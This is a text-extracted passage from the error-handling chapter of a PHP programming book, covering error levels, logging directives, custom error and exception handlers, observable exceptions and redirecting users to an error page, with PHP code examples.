  • 262. 238 The PHP Anthology The Logic Error Another type of error—the logic error—is common but much harder to detect. Such an error produces an incorrect result as the output of apparently successful execution. These types of errors are often program design problems created by the programmer. They’re generally addressed during unit testing, and will not be covered in this chapter. Errors in PHP 5 come in two flavors: standard PHP errors and exceptions. Standard PHP error reporting handles all kinds of errors. Error messages are reported globally, and each is associated with an error level that represents the error’s severity or type. Traditionally, PHP environmental and programming errors were handled via a function’s return value, or by generating global warnings or fatal errors using the trigger_error or die functions. However, this was typically only the case for developers using versions prior to PHP 5, in which no other error reporting method was available. In PHP 5, exceptions are used to indicate that an exceptional event—for example, an environmental or programming error—has occurred, disrupting the normal exe­ cution of the script. Exceptions are reported using the throw statement, usually to indicate that execution cannot continue as expected. They’re caught and handled using a try {…} catch(Exception $e) {…} block, which is included as part of programming logic. Throwing and catching exceptions is the primary error-handling mechanism of object oriented programming. Every exception object is an instance of, or an instance of a subclass of, PHP 5’s native Exception class. In this chapter, we’ll look at the flexibility PHP offers in order to let us extend its native error- and exception-reporting mechanisms. We’ll also see how you can harness these mechanisms to gain greater control over the ways in which errors and exceptions are handled. These tools will help you when you’re dealing with errors, and provide you the means with which to gracefully exit execution, easily debug your applications, and successfully monitor the health of your applications. What error levels does PHP report? As I noted in the introduction, PHP errors fall into a variety of categories. Effective harnessing of PHP’s error-handling mechanisms requires some knowledge of PHP
  • 263. Error Handling 239 errors, so let’s take a quick look at a summary of PHP error levels. You may also want to check out the PHP error function manual page for full information on this topic.1 Solution PHP categorizes errors into various levels, each representing an integer bit operat­ or—the integer increasing with error severity. The error levels most developers need to understand are shown in Table 9.1.2 What built-in settings does PHP offer for error handling? If PHP can generate errors, there must be some automated way to handle these errors, right? Providing error reporting facilities without the capabilities to handle the errors leaves developers hobbled. So, what error handling settings are available to de­ velopers? Solutions PHP has several built-in mechanisms for displaying and logging errors. Each of the following directives may be administered via ini_set, your web server’s .htaccess file, or the php.ini file. The error_reporting Directive Set the error_reporting directive to indicate which errors need to be reported. During development, you’d typically set this directive to E_ALL | E_STRICT, which will notify you of any PHP errors that occur in your application. Once your code moves to the production environment, you may want to tighten this setting up a bit so that your error logs (which we’ll discuss in detail in a moment) don’t fill up; E_ERROR | E_USER_ERROR | E_WARNING | E_USER_WARNING is usually a good setting for production environments. 1 http://www.php.net/errorfunc/ 2 Note that the _USER variants indicate errors that are triggered in user-generated code by trigger_error or die, and that are of a roughly equivalent level of severity.
  • 264. 240 The PHP Anthology Table 9.1. PHP Error Levels Level Description E_NOTICE / E_USER_NOTICE This notice indicates a potential error in the script—note my emphasis on potential. Errors of this sort typically mean that something has occurred that may indicate logical errors or omissions, even though it hasn’t caused the PHP interpreter to fail. Examples include accessing undefined variables or array indices. E_WARNING / E_USER_WARNING A warning indicates a nonfatal error from which PHP has recovered. Warnings are generally reserved for environmental errors, such as the inability of the executing script to access a database or web service, errors that occur while you’re running a third-party extension, and so on. E_ERROR / E_USER_ERROR These are fatal runtime errors from which PHP was unable to recover; typically, they will be errors that occur on the OS level, such as problems encountered while allocating memory or disk space. Note that E_USER_ERRORs are actually recoverable; when such errors are caught in a custom error handler, the developer can choose whether or not to exit script execution. E_STRICT E_STRICT errors are basically notices, but these are deployed to indicate that code you’ve used may be deprecated, or may not follow best practices as determined by the PHP interpreter. The display_errors Directive When display_errors is set, PHP errors will be displayed inline in your script’s output. This is a good setting to use in development, though it has the potential to disrupt any HTTP headers you’re trying to send if an error occurs while they are being output. Once your application’s in production, turn display_errors off so that these mes­ sages are not displayed to your users.
  • 265. Error Handling 241 The log_errors and error_log Directives If log_errors is set, errors will be logged to the location specified in the error_log directive. This setting is useful for maintaining a running log of the errors en­ countered in your application or site, and is helpful because it acts as a reference for all the errors that may arise when the display_errors directive is disabled. You will likely want to set ignore_repeated_errors and ignore_repeated_source to prevent those logs from filling up when the same error occurs repeatedly. How can I trigger PHP errors? The capability to trigger errors is not restricted to the PHP interpreter. At times, you may find it useful to generate PHP errors yourself—they can be used as a debugging aid, to generate deprecation notices in code you’re releasing to others, and more. So, how do you trigger PHP errors? Solution You can trigger errors within your code using PHP’s trigger_error function. This function has the following prototype: trigger_error($error_message, $error_type = E_USER_NOTICE); The $error_type argument must be one of the user error constants E_USER_NOTICE, E_USER_WARNING, or E_USER_ERROR, which, as noted in the code above, defaults to E_USER_NOTICE. Discussion When they first discover trigger_error, PHP developers have a tendency to use it for any error conditions they observe in their code. However, better strategies exist. Trigger E_USER_NOTICEs primarily in development when debugging your code. Notices can be helpful for indicating the values that have been set, when certain pieces of code are executing, and so on. (Note, however, that this isn’t the most ef­ ficient way to debug.)
  • 266. 242 The PHP Anthology Trigger E_USER_WARNINGs when your code detects exceptional situations from which it can recover gracefully. For example, such a situation might arise if a web service cannot be contacted, but your code is still able to generate an error message; in this case, the warning might serve to indicate to you later to check your application’s connectivity with the web services server. Trigger E_USER_ERRORs when your code hits a problem from which it cannot recover. Examples of this kind of problem include a situation in which the executing script is unable to connect to your database, or you discover that your web site template directory is unreadable. How do I implement a custom error handler with PHP? The php.ini settings for handling errors are fairly limited. They really only cover the tasks of displaying and logging errors—you can’t even specify the format in which those errors are logged or displayed! What if you want to do something other than these tasks? Solution PHP allows developers to define custom error handlers. Such error handlers may constitute any valid PHP callback: a function, a static class method, or a dynamic class method. Whatever callback you decide to use, it must follow the error handler prototype: function handler($errno, $errmsg[, $filename[, $linenum[, $vars]]]) When your custom error-handling function is called, the first parameter $errno will contain the level of the error as an integer; the second parameter, $errmsg, will contain the description of the error. $filename contains the name of the file con­ taining the code that raised the error, $linenum contains the line number where the error was raised, and $vars contains an array of all variables that existed in the scope in which the error was triggered. You can choose to perform any task you like within your error handler: log errors, mail the error details to system adminis­ trators or developers, print the error details, and so on.
  • 267. Error Handling 243 However, you should understand that if you do not explicitly exit script execution in your error handler, program execution will continue from the location at which the error was triggered originally. Your code will have no idea what tasks were undertaken in the error handler, though. Use the set_error_handler function to tell PHP to use your error handler: set_error_handler($error_handler[, $error_types]) The first parameter is a callback that references your error handler. The optional second parameter is used to tell PHP which error types should be handled by your custom function. By default, if no error type is provided, all errors will be handled except for E_ERROR, E_PARSE, E_CORE_ERROR, E_CORE_WARNING, E_COMPILE_ERROR, E_COMPILE_WARNING, and E_STRICT. Since you can specify the types, you can specify multiple error handlers—one for each type you wish to handle. An easier solution, however, is to use a single error handler for all error types you wish to handle, and in it employ a switch statement that uses the value of the first argument to the handler function—represented by $errno—to select alternative actions that respond to specific error types. $errno is the error level of the triggered error, the integer value represented by the error type constants listed in “What error levels does PHP report?”. Then, the error handler needs to return true if the error was handled, or false if not; returning false tells PHP to pass on error-handling control to the default error handler. As an example, here’s a PHP 5 class that imple­ ments a custom error handler which selects alternative actions appropriate to the level of the error raised: ErrorHandler.class.php (excerpt) <?php class ErrorHandler { protected $_noticeLog = '/tmp/notice.log'; public $message = ''; public $filename = ''; public $line = 0; public $vars = array(); public function __construct($message, $filename, $linenum, $vars) { $this->message = $message;
  • 268. 244 The PHP Anthology $this->filename = $filename; $this->linenum = $linenum; $this->vars = $vars; } The constructor accepts the various error attributes as arguments and stores them in the object’s properties. The $_noticeLog variable stores the location of the log file for E_USER_NOTICE level error messages. If you’re testing on a Windows machine you should change this value to something like C:notice.log, or an appropriate location on your system. Here’s the custom error-handling method of our class: ErrorHandler.class.php (excerpt) public static function handle($errno, $errmsg, $filename, $line, $vars) { $self = new self($errmsg, $filename, $line, $vars); switch ($errno) { case E_USER_ERROR: return $self->handleError(); case E_USER_WARNING: case E_WARNING: return $self->handleWarning(); case E_USER_NOTICE: case E_NOTICE: return $self->handleNotice(); default: return false; } } The handle method above instantiates an ErrorHandler object with the error mes­ sage, filename, line number, and variable context, and then calls the appropriate handler method based on $errno. If the error level does not match the levels handled by this class, it reverts the error flow to the default error handler by returning false.
  • 269. Error Handling 245 Now we can build the methods that handle the different types of errors. First up is the handleError method: ErrorHandler.class.php (excerpt) public function handleError() { ob_start(); debug_print_backtrace(); $backtrace = ob_get_flush(); $body =<<<EOT A fatal error occured in the application: Message: {$this->message} File: {$this->filename} Line: {$this->line} Backtrace: {$backtrace} EOT; error_log($body, 1, 'sysadmin@example.com', "Fatal error occurredn"); exit(1); } handleError is used to handle E_USER_ERROR level errors. When it’s called, this method sends an email to the system administrator and halts execution. It uses a little-known feature of PHP’s error_log function to send the email—if you specify 1 for the second argument and an email address as the third argument, it employs the php.ini settings for sendmail to send an email. Finally, handleError halts execu­ tion of the script using exit.3 Our next method is handleWarning: ErrorHandler.class.php (excerpt) public function handleWarning() { $body =<<<EOT An environmental error occured in the application, and may indicate a potential larger issue: Message: {$this->message} 3 Calling exit with an integer exit status parameter of anything other than 0 indicates a script failure.
  • 270. 246 The PHP Anthology File: {$this->filename} Line: {$this->line} EOT; return error_log($body, 1, 'sysadmin@example.com', "Subject: Non-fatal error occurredn"); } handleWarning is used to handle E_USER_WARNING and E_WARNING errors. Like handleError above, it sends an email to the system administrator; however, instead of halting execution, it simply returns the result of the error_log function—true if the function succeeds, false if it fails. Finally, the handleNotice method: ErrorHandler.class.php (excerpt) public function handleNotice() { $body =<<<EOT A NOTICE was raised with the following information: Message: {$this->message} File: {$this->filename} Line: {$this->line} EOT; $body = date('[Y-m-d H:i:s] ') . $body . "n"; return error_log($body, 3, $this->_noticeLog); } } handleNotice handles E_USER_NOTICE and E_NOTICE level errors. Since notices do not represent dangerous errors, we assume that the system administrator doesn’t need to know about them immediately, and log them to a file instead of sending an email. Finally, we tell PHP that we want ErrorHandler::handle to act as our error handler, by using the aptly named set_error_handler function: ErrorHandler.class.php (excerpt) set_error_handler(array('ErrorHandler', 'handle'));
  • 271. Error Handling 247 Discussion PHP error handlers are trivial to implement, and, because you can write your own functionality, you can create whatever error handling strategies you desire. Be careful to test your code stringently, however, as you don’t want to find yourself in a circular error-handling situation, where your error handler starts emitting errors that it then needs to handle itself. How do I log and report errors? You need to create a robust web application, but even the best software engineers make mistakes. Perhaps you’re using third-party libraries that omit deprecation notices. Or maybe your code, though in its infancy, has been pushed into production due to time constraints. You need to keep track of the errors occurring on your site somehow. What tools does PHP offer for the job? Solution Logging errors is one thing—reporting them is a whole different ballgame. Logging is usually best done via PHP’s own logging facilities. For example, you’ll recall that the error_log setting can be set at the php.ini level, using the ini_set function. PHP’s error_log function can be used both to log errors and to send emails. It can log errors to PHP’s error_log or an alternate log destination, or send an email to a specified address (it uses mail to do the actual sending). Also, if you’re using a de­ bugger, it can send the information over the debugging connection. While PHP’s logging functionality is nice, it still needs to be triggered within your code—typically via your custom error handler. The simplest way to log errors is to set up logging via your php.ini settings, like so: error_reporting(E_ALL & (~E_NOTICE | ~E_USER_NOTICE)); ini_set('error_log', '/tmp/php-error.log'); ini_set('ignore_repeated_errors', true); ini_set('ignore_repeated_source', true); ini_set('log_errors', true);
  • 272. 248 The PHP Anthology These settings will log all errors to /tmp/php-error.log except notices, repeated errors, and errors reported from the same source. You can also set up a custom error handler to conduct logging or reporting. Typically, the safest and easiest way to do so is simply to use error_log, as we saw in the solution in “How do I implement a custom error handler with PHP?”. If you intend to use email to report errors in your custom error handler, doing so via the error_log function or the standard PHP mail function may not be the best solution. A third-party library, for example PEAR::Mail, may be better suited to the task. In those cases, use the library within your custom error handler to send the email.4 Finally, keep in mind that log files and email are not the only ways to report errors. You could also tell PHP to send SMS text messages and pager messages to your sysadmins or developers. How can I use PHP exceptions for error handling? PHP errors are useful, but they pose many problems: ■ There’s no way to allow an error to bubble up the calling stack—errors must be handled immediately. ■ The only way to exit the function or method that’s executing when an error is triggered is to have the handler exit script execution. ■ It’s difficult to determine what the problem is without interrogating the error message, as any error you trigger yourself won’t have an associated error code or name. PHP 5 marked the introduction of a new error-handling scheme: exceptions. As I mentioned at the start of this chapter, an exception is used to denote exceptional behavior on the part of the script—situations in which something went wrong, or something unexpected occurred. Exceptions are thrown by your code, and bubble up through the code until they’re caught: 4 For more information about sending email with PHP, see Chapter 7.
  • 273. Error Handling 249 throw new Exception( "There's something rotten in the state of this code"); So, how can we use PHP exceptions to perform error handling? Solution Unlike PHP errors, exceptions can always be caught within your code, which allows you to handle them gracefully when you have the facilities to do so. When an ex­ ception is thrown, PHP will immediately look for a matching catch block and run the code within it. Thus, it’s important to wrap your code within a try {…} catch(Exception $e) {…} block at the point at which you wish to catch potential exceptions. If an exception is not caught, PHP will generate a E_FATAL error with the message “Uncaught Exception.” Now, within the catch block, you can deal with the exception in the way you feel is best. For example, imagine you’re generating a web page that includes data from a web service. You may throw an exception when the web service is unavailable, but catch it later and display a “Service unavailable” message within the web page you’re generating: try { $data = $this->getDataFromService(); } catch (ServiceUnavailableException $e) { $data = 'Service unavailable'; } In this example, the script doesn’t exit completely as a result of the error. Instead, the script finishes executing and the web page is generated successfully, so you’re able to deal with the error at the right time and take appropriate action. If this sounds good, you’ll be pleased to hear that it gets even better—PHP 5 saw the introduction of object type hinting. This facility forces parameters of functions and methods to be objects of a particular class, or subclasses of that class. You can use type hinting when you’re catching exceptions in a catch (Exception $e) {…} block—multiple catch blocks can be used to catch different classes of exceptions:
  • 274. 250 The PHP Anthology try { ⋮ try some code… } catch (PDOException $e) { ⋮ handle PDO exceptions… } catch (Zend_Exception $e) { ⋮ handle Zend Framework exceptions… } catch (Exception $e) { ⋮ handle all other exceptions… } Discussion One common mistake novices make is to use exceptions for every type of error situation. For instance, I’ve often seen constructs like this used to validate data: public function isValidData($data) { if (!is_array($data)) { throw new Exception('Invalid data'); } if (!array_key_exists($data)) { throw new Exception('Id key missing'); } ⋮ finish validating… return true; } What’s wrong with this code? Simply this: invalid data is just one of the possible results; it’s not an exceptional situation. In the case above, it’s best simply to return an error message or true. Then, you can always check for Boolean true or is_string on the return value:
  • 275. Error Handling 251 public function isValidData($data) { if (!is_array($data)) { return 'Invalid data'; } if (!array_key_exists($data)) { return 'Id key missing'; } ⋮ finish validating… return true; } Another common mistake that’s related to the one above is to use exceptions as part of the script’s program flow. Code that uses the original definition of isValidData above, which throws exceptions, might look like this: try { $result = $this->isValidData($data); } catch (Exception $e) { if ('Invalid data' == $e->getMessage()) { $error = $this->missingData(); } elseif ('Id key missing' == $e->getMessage()) { $error = $this->missingId($data); } else { $error = 'Unknown error'; } } if (isset($error)) { ⋮ handle error… } In this example, the code uses exceptions within the program flow to make decisions; it’s almost the equivalent of programming using GOTO statements. This is a fairly
  • 276. 252 The PHP Anthology confusing way to express decision-making branches in your code, particularly when other methods are much more suitable (including testing return values from the function/method call, performing the various error method calls within the called function/method, and so on). Use exceptions when you can detect an event or condition in a unit of code that prevents any further execution. Good examples include: ■ database errors ■ web service call errors ■ filesystem errors (such as permissions, missing paths, and so on) ■ data encoding errors (until PHP 6 is out, that is) ■ parse errors (for example, when parsing configuration or template files) When used wisely and sparingly, exceptions become a very powerful error-handling tool. For more information on PHP exceptions, read the relevant PHP manual page.5 How do I create a custom Exception class? The base Exception class provided in PHP 5 can be extended, but since exceptions bubble up the stack until they’re caught, why would you bother to create a custom Exception class? Well, if you use different Exception classes, it becomes much simpler to target specific types of exceptions and recover from them. Other reasons why you’d create a custom Exception class include: ■ You want to log specific types of exceptions. ■ You need to mail exception messages of particular classes. ■ You want to create special __toString output for pretty printing exceptions, or use exceptions in other specialized circumstances (for example, an XML-RPC client or server might use an exception class for fault responses, with the __toString method creating the XML fault response). 5 http://php.net/exceptions/
  • 277. Error Handling 253 Solution Exception classes extend either the base PHP Exception class, or a class derived from it. To be able to catch your custom exception, all you need to do is extend it: class My_Exception extends Exception {} An exception that’s defined like this will act as would any other exception, though it can be type hinted as My_Exception when you’re catching exceptions: try { ⋮ try some code… } catch (My_Exception $e) { ⋮ handle exception… } The only overrideable methods in the Exception class are __construct and __toString. If you’re overriding the __construct method, your custom exception should call parent::__construct to ensure all data in the exception is properly set: class My_Exception extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); ⋮ do the rest of the initialization… } } Discussion It’s useful to create exception classes to cover distinct groups of code that may span more than one class. For instance, if you were creating a suite of input filter classes, you may want to create a single exception class to cover them; however, if you’re creating an MVC (Model-View-Controller) suite, you may want a different type of exception class for each distinct area of the MVC pattern.
  • 278. 254 The PHP Anthology Earlier, we mentioned logging and emailing exceptions. Unlike PHP errors, excep­ tions are not logged, unless they remain uncaught, in which case they are logged as E_FATAL errors. Most of the time, you won’t want or need to log exceptions. However, some types of exceptions may indicate situations that need attention from a developer or sysadmin—for example, your script is unable to connect to a database (when PDO throws exceptions, not PHP errors, for instance), a web service is inac­ cessible, a file or directory is inaccessible (due to permissions, or the fact that it’s simply missing), and so on. The easy way to handle these situations is to override the exception’s constructor to perform the notification task. Here’s a custom exception class called My_Exception that calls the error_log function from within the constructor method: class My_Exception extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); error_log($this->getTraceAsString(), 3, '/tmp/my_exception.log'); } } While this is an easy method for performing special error-logging actions when ex­ ceptions occur, I find that making the exception observable offers even more flexib­ ility. Consider this usage example: Observable_Exception::attach(new Logging_Exception_Observer()); Observable_Exception::attach(new Emailing_Exception_Observer()); class Foo_Exception extends Observable_Exception {} ⋮ perform some work… throw new Foo_Exception('error occurred'); In this example, I’ve created a base exception class that’s observable, and called it Observable_Exception. I’ve attached two observers to this class: one that logs, and one that sends email. These observers check the type of the exceptions they observe, and use that information to decide whether or not to act.
  • 279. Error Handling 255 This strategy provides some flexibility in terms of the way exceptions are handled, without requiring the use of an explicit exception handler. In addition, you can attach an observer anywhere in your code, which means that you can decide how to handle any given exception dynamically. The code that implements observable exceptions is as follows: Exception_Observer.class.php (excerpt) interface Exception_Observer { public function update(Observable_Exception $e); } This code defines the interface for exception observers. We’ll implement the Exception_Observer interface in a custom class in just a minute. Next, we create the Observable_Exception class by extending the Exception class. We add a static property—$_observers—to hold an array of Exception_Observer instances: Observable_Exception.class.php (excerpt) class Observable_Exception extends Exception { public static $_observers = array(); Next, a static method is used to attach observers. Type hinting enforces that only classes of the Exception_Observer type are allowed as observers: Observable_Exception.class.php (excerpt) public static function attach(Exception_Observer $observer) { self::$_observers[] = $observer; } We override the constructor method so that when the exception is instantiated all observers are notified via a call to the notify method:
  • 280. 256 The PHP Anthology Observable_Exception.class.php (excerpt) public function __construct($message = null, $code = 0) { parent::__construct($message, $code); $this->notify(); } Finally, the notify method loops through the array of observers and calls their update methods, passing a self-reference to the Observable_Exception object, $this: Observable_Exception.class.php (excerpt) public function notify() { foreach (self::$_observers as $observer) { $observer->update($this); } } } Here’s an example of an exception observer: Logging_Exception_Observer.class.php (excerpt) require 'Exception_Observer.class.php'; require 'Observable_Exception.class.php'; class Logging_Exception_Observer implements Exception_Observer { protected $_filename = '/tmp/exception.log'; public function __construct($filename = null) { if ((null !== $filename) && is_string($filename)) { $this->_filename = $filename; } } public function update(Observable_Exception $e) {
  • 281. Error Handling 257 error_log($e->getTraceAsString(), 3, $this->_filename); } } This particular implementation of Exception_Observer logs exception information to a file. If you’re testing this code, make sure you set the $_filename variable to an appropriate location and filename. This strategy offers more flexibility than simply handling the logging or reporting in the constructor method of a custom exception class, or defining an exception handler function. Firstly, if you build a hierarchy of exception classes deriving from the Observable_Exception class, you can attach any number of observers to each type of observable exception, allowing for the customization of the exception envir­ onment at any time without necessitating that changes be made to the actual excep­ tion code. It also means that only the top-level exception class needs to contain any additional code; all classes that derive from that class can be empty stubs. Finally, each observer’s update method can use type hinting via PHP’s instanceof operator to decide whether or not any action needs to be taken. How do I implement a custom exception handler with PHP? A custom handler for PHP errors can be specified using the set_error_handler function. Exceptions bubble up until they’re caught, but what happens if they’re not caught? By default, any exception that isn’t caught raises an E_FATAL error. You could catch this error with a PHP error handler, but is there another way to handle uncaught exceptions? Solution Like PHP errors, exceptions can be handled automatically using a custom exception handler that’s specified with the set_exception_handler function. You’d typically implement an exception handler if you wanted your program to take a particular action for an uncaught exception—for example, you might want to redirect the user to an error page, or to log or email the exception so the developer can correct the issue.
  • 282. 258 The PHP Anthology The basic approach involves providing a callback to set_exception_handler: null|string set_exception_handler(mixed callback) Discussion Since exception handlers handle any uncaught exception—not exceptions of specific types—they’re somewhat easier to implement than error handlers. In this example, we create a custom exception-handling class that logs uncaught exceptions to a file, and displays a simple error page: ExceptionHandler.class.php (excerpt) <?php class ExceptionHandler { protected $_exception; protected $_logFile = '/tmp/exception.log'; public function __construct(Exception $e) { $this->_exception = $e; } public static function handle(Exception $e) { $self = new self($e); $self->log(); echo $self; } The entry point for this exception handler is the static handle method, which in­ stantiates itself, logs the exception, then displays an error message by echoing itself (using the magic __toString method). If you’re testing this code, make sure you set the $_logFile variable to an appropriate location and filename. This code uses PHP’s error_log function to log the exception backtrace to a file:
  • 283. Error Handling 259 ExceptionHandler.class.php (excerpt) public function log() { error_log($this->_exception->getTraceAsString(), 3, $this->_logFile); } The __toString implementation below creates a “pretty” error page that’s displayed when an exception is handled, preventing the display to users of any sensitive in­ formation contained in the exception backtrace: ExceptionHandler.class.php (excerpt) public function __toString() { $message =<<<EOH <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Error</title> </head> <body> <h1>An error occurred in this application</h1> <p> An error occurred in this application; please try again. If you continue to receive this message, please <a href="mailto:webmaster@example.com" >contact the webmaster</a>. </p> </body> </html> EOH; return $message; } } Finally, we tell PHP we want to handle exceptions using ExceptionHandler::handle: set_exception_handler(array('ExceptionHandler', 'handle'));
  • 284. 260 The PHP Anthology And we’re done! How can I handle PHP errors as if they were exceptions? Perhaps you prefer exceptions to PHP errors, and want to handle fatal or environ­ mental PHP errors as if they were exceptions. No problem! Solution This task is relatively simple. We need to create a custom exception class and, to handle errors, we must add a public static method that throws an exception—that is to say, creates an instance of itself: ErrorToException.class.php (excerpt) class ErrorToException extends Exception { public static function handle($errno, $errstr) { throw new self($errstr, $errno); } } This class does not need to extend Exception in particular—just an Exception-de­ rived class. You could, for instance, extend the Observable_Exception from “How do I create a custom Exception class?”. You won’t want to handle all PHP errors this way, though—E_NOTICEs and E_STRICTs don’t justify such handling. Fortunately, set_error_handler takes an error level as its second argument: set_error_handler( array('ErrorToException', 'handle'), E_USER_ERROR | E_WARNING | E_USER_WARNING ); The example code above dictates that only warnings and user errors will be thrown as exceptions.
  • 285. Error Handling 261 Discussion While handling PHP errors as exceptions could be achieved even more simply using a function, rather than a static method, the approach I’ve explained here has several advantages. First, it allows you to type hint for these particular exceptions. Second, the exception class above could extend another custom exception class that provides additional functionality, such as the ability to log or mail exception information. How do I display errors and exceptions gracefully? You’ve taken heed of the advice to turn off display_errors on your production servers so that you don’t accidentally expose sensitive system information to users (and potentially hackers). If you’re not going to display errors, you’ll need to display something else instead. But how can you make this happen? Solution The solution to this common problem is to build the functionality into your error or exception handler. Displaying errors from an error or exception handler is a fairly trivial task, although you may need to take into consideration whether or not the error is fatal, and whether or not output buffering is being used. Since exception handlers are only triggered in the event of an uncaught exception, you can assume a fatal error when working with an exception handler; an example of an exception handler was shown in “How do I implement a custom exception handler with PHP?”. When you’re handling errors, however, you’ll need to check the error level of each error—you may want to display errors at some error levels, and not others, for example. The error-level checking can be done by testing the error level in your error handler, or by passing a second argument to set_error_handler to define which error levels the error handler should accom­ modate. As for output buffering, we simply need to check the return value of ob_get_level. If that function returns zero, no output buffering is currently activated and we may
  • 286. 262 The PHP Anthology proceed; otherwise, we need to clean out all output buffers, which we can achieve easily by nesting an ob_end_clean call in a while loop: while (@ob_end_clean()); We need to use the error suppression operator, @, in this case, because the function throws an E_NOTICE when it runs out of buffers to clean. Let’s put together all the pieces, trapping what we deem fatal errors and throwing them as exceptions, and then implementing an exception handler that displays an error page, taking into consideration any output buffering that may be in process: safeErrorDisplay.php (excerpt) class ErrorToException extends Exception { public static function handle($errno, $errstr) { throw new self($errstr, $errno); } } set_error_handler( array('ErrorToException', 'handle'), E_USER_ERROR | E_WARNING | E_USER_WARNING ); The code above defines a class that can be used as a PHP error handler. It simply throws itself as an exception. Here, I’ve set it to handle error types of E_USER_ERROR, E_WARNING, and E_USER_WARNING, all of which are errors that can be caught, and are likely indications that something’s seriously askew in the script. Next, let’s define our ExceptionHandler class: safeErrorDisplay.php (excerpt) class ExceptionHandler { protected $_exception; protected $_logFile = '/tmp/exception.log'; public function __construct(Exception $e) {
  • 287. Error Handling 263 $this->_exception = $e; } public static function handle(Exception $e) { $self = new self($e); $self->log(); while (@ob_end_clean()); ob_start(); echo $self; ob_end_flush(); } So far, we’ve defined a class with a static handle method that accepts an exception as its sole argument. The method instantiates itself, logs the exception, then generates an error message. Before generating the error message, it clears out all output buffers to ensure that the error message is the only output returned. Let’s turn to the details of logging and output generation: safeErrorDisplay.php (excerpt) public function log() { error_log($this->_exception->getTraceAsString(), 3, $this->_logFile); } Logging is undertaken with PHP’s own error_log function. This approach is safe, it won’t generate errors itself, and it’s simple to use. If you’re testing this code, be sure to put the appropriate path and filename in the $_logFile variable. Next, we implement a __toString method: safeErrorDisplay.php (excerpt) public function __toString() { $message =<<<EOH <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
  • 288. 264 The PHP Anthology <head> <title>Error</title> </head> <body> <h1>An error occurred in this application</h1> <p> An error occurred in this application; please try again. If you continue to receive this message, please <a href="mailto:webmaster@example.com" >contact the webmaster</a>. </p> </body> </html> EOH; return $message; } } That code should look familiar—it’s similar to the solution in “How do I implement a custom exception handler with PHP?”. Our ExceptionHandler class has a __toString method that uses a heredoc to generate XHTML output. The method could be modified to show details of the exception, such as the message or backtrace, but that practice is discouraged in the production environment. Finally, of course, we define ExceptionHandler::handle() as the exception handler: safeErrorDisplay.php (excerpt) set_exception_handler(array('ExceptionHandler', 'handle')); Discussion The solution I’ve presented here achieves two goals: it throws severe PHP errors as exceptions, and uses an exception handler to log the issues, which generates and displays a generic error page for the user. Utilizing this solution is a good practice for production systems, as it allows you to keep track of site errors while generating a safe display for the end user.
  • 289. Error Handling 265 Unfortunately, this solution has one drawback: it doesn’t prevent users from refresh­ ing the page and triggering the error condition again. Quite often, if a serious error occurred, you may not want to keep the page that handles the error display code in the same environment as the page on which the error was triggered. In fact, there may be reasons why displaying an error page under these circumstances might fail completely (including a lack of database connectivity, bad permissions on template files, and so on). Additionally, if the user clicks on the browser’s Refresh button to see if the error occurs again, they’ll likely just perpetuate the problem. Finally, building the display HTML into a class can have a number of downsides—for in­ stance, being completely separate from the site template and style sheets, it may not match your site’s look and feel. As such, you may want to consider redirecting users to an error page, instead of simply displaying an error page. How do I redirect users to another page following an error condition? So, you’ve got error and exception handlers in place, tried having them display error pages, and you’re now worried about what will happen when a user refreshes the page. As an example, imagine this scenario: a database connectivity issue causes your site’s homepage to display an error page, and now hundreds or thousands of incoming users are clicking their Refresh buttons. It may be time to redirect them to an error page instead. Solution For this method to work, you’ll need to ensure that output buffering is on, so that no headers are sent to the browser prior to the redirect header being sent. The fol­ lowing sample should serve as a guideline: class ExceptionRedirectHandler { protected $_exception; protected $_logFile = '/tmp/exception.log'; public $redirect = 'http://www.example.com/error'; public function __construct(Exception $e) { $this->_exception = $e; }
  • 290. 266 The PHP Anthology public static function handle(Exception $e) { $self = new self($e); $self->log(); while (@ob_end_clean()); header('HTTP/1.1 307 Temporary Redirect'); header("Cache-Control: no-cache, must-revalidate"); header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header('Location: ' . $self->redirect); exit(1); } As its name implies, ExceptionHandler::handle will be used as an exception handler. It instantiates itself, logs the exception, clears the output buffer, and then redirects to the page indicated in the $redirect property. Several other HTTP headers are specified as well. We output a HTTP status code of 307, which indicates to the browser that the redirect is only temporary. Additionally, Cache-Control and Expires are set in such a way that any subsequent visit to the page will force the browser to refresh the con­ tent—and with any luck, display the intended content instead of an error. Logging is implemented using PHP’s error_log, to which we specify a file argument: public function log() { error_log( $this->_exception->getTraceAsString(), 3, $this->_logFile ); } } The actual message that’s logged is the exception’s backtrace. If you’re testing this code, be sure to put the appropriate path and filename in the $_logFile property. And the final step, of course, tells PHP that our class’s static method will be handling the exceptions: set_exception_handler(array('ExceptionRedirectHandler', 'handle'));
  • 291. Error Handling 267 Discussion When it’s combined with the solution shown in “How can I handle PHP errors as if they were exceptions?”, the strategy I’ve outlined here will allow you to handle PHP errors and exceptions gracefully, and to prevent issues associated with re- propagating the conditions when users accidentally—or deliberately—refresh the page. By redirecting users, you can ensure that if they refresh the page, they’ll remain on the same error page. You can even take such steps as setting a session cookie to prevent them from going back to the offending page, if you wish. If you use this method, I recommend that you redirect your application’s users to a page that loads a minimal amount of code—perhaps even a static page—to avoid the situation in which environmental errors, such as database connectivity or tem­ plate directory permissions, prevent error display. Regardless of what else the error page displays, it should provide, as a minimum, the basic navigational elements found on the rest of your site. Summary In this chapter, we took a look at the variety of options PHP offers for error handling. PHP’s error level constants were discussed, as was the behavior you can expect each level to emit. We then turned to look at the built-in mechanisms that PHP offers for handling error conditions automatically: the mechanisms we reviewed included displaying and logging errors. Since PHP offers standard mechanisms for error handling, you may want to be able to trigger errors of your own—a topic that was discussed in detail. While error handling can be automated through the PHP inter­ preter itself, sometimes it’s useful to be able to handle errors yourself, so that you can undertake such tasks as logging, recovery, and more; to this end, we discussed how to write and use custom error handlers. PHP 5 introduced a new error mechanism in the form of exceptions. All PHP 5 ex­ ceptions derive from a single internal class called Exception. We discussed how exceptions bubble up through the code until they’re caught, 